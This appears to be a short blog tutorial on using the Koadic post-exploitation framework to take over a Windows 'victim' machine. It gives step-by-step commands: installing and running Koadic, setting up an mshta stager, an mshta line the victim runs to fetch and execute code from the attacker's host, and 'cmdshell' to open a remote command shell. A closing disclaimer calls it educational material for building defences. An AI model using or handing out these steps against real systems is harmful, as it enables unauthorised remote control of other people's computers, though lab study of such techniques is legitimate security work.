How to gain access to a windows machine with one command.

Manoj Deshmukh
3 min readJan 23, 2023

Overview

This article will walk you through the steps of using Koadic to access a Windows machine with a single click.

Koadic

Koadic is a tool available on GitHub used in Windows post-exploitation rootkits, similar to other penetration testing tools such as Meterpreter and Powershell Empire.

Requirements

  1. Attacker Machine (192.168.1.13)
  2. Victims Machine (192.168.1.5)
  3. Koadic Tool

Step 1: Let's start the process of gaining access to the Windows machine using Kali Linux.

Open the attacker machine, here we are using Kali Linux (192.168.1.13).

Attacker machine — Kali Linux

open the terminal and install koadic

$ sudo apt install koadic

and run

$ sudo koadic

koadic running on the attacker machine

now use command

(koadic: sta/js/mshta)# use stager/js/mshta

(koadic: sta/js/mshta)# info

here SRVHOST is the attacker machine’s Ip address

SRVPORT is the attacker machine’s port

and enter command

(koadic: sta/js/mshta)# run

Now you can see that you got an endpoint here

[>] mshta http://192.168.1.13:9999/9xD50

Step 2: Let's go to the Windows machine (Victims Machine)

Now simply open cmd on a windows machine

enter the endpoint which got in the attacker's machine and click on enter

and you are done.

Step 3: Checking the connection received in Attackers Machine

Now go to the attacker’s machine and you should see the below message “Zombi 0: Staging new connection (192.168.*.*) on Stager 0”

Now that you are on the victim's computer, all you need to do is explore his PC with some basic commands.

(koadic: sta/js/mshta)# zombies

It gives you the list of current sessions running with ID, IP address and Status.

now let’s start the command line in windows machine by using the command

(koadic: sta/js/mshta)# cmdshell 0

Here 0 is the ID of a session

Now use the windows command line commands

Now you are completely accessible to the victim machine.

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching the attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages resulting from the misuse of this information or code.

--

--

Manoj Deshmukh

4+ Years’ Experience in Cybersecurity, VAPT, Cloud and Kubernetes Security, Cyber Forensics. CySA+ & CEH Practicals